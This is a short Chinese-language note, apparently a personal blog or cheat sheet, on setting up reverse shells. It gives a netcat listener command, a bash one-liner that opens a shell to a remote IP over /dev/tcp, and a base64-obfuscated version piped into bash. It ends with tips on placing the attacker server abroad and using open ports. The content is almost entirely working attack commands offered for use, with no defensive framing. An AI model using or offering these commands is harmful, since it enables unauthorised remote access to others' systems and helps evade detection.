反弹shell , 超级强大, 英文 reverse shell (反向shell )
参考
在线生成器:https://shellgenerator.github.io
这个简直太强大了!
1. 在本地搭建好一个 reverse shell server: nc -nvlp 5000
这就表示,你的本地已经有5000端口在监听从外面发过来的 请求了。
此时屏幕是冻结的(等待中)
2. 在远程,可以运行任意命令(见上面的在线生成器). 例如;
bash -i >& /dev/tcp/172.17.211.247/5000 0>&1
3. 在本地,就会发现,已经登录了远程服务器了。 操作跟本地shell是一样一样的! 太牛了!
几个例子
1. 转换
$ echo "/bin/bash -i >& /dev/tcp/172.17.211.247/5000 0>&1" | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4yMTEuMjQ3LzUwMDAgMD4mMQo=
$ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4yMTEuMjQ3LzUwMDAgMD4mMQo= | base64 -d | bash
就可以运行了。
心得
1. attacker server 端口要全部开启,或者使用80端口
2. 找个境外的服务器
3. 先测试一下该server ip在国内是否可以访问的通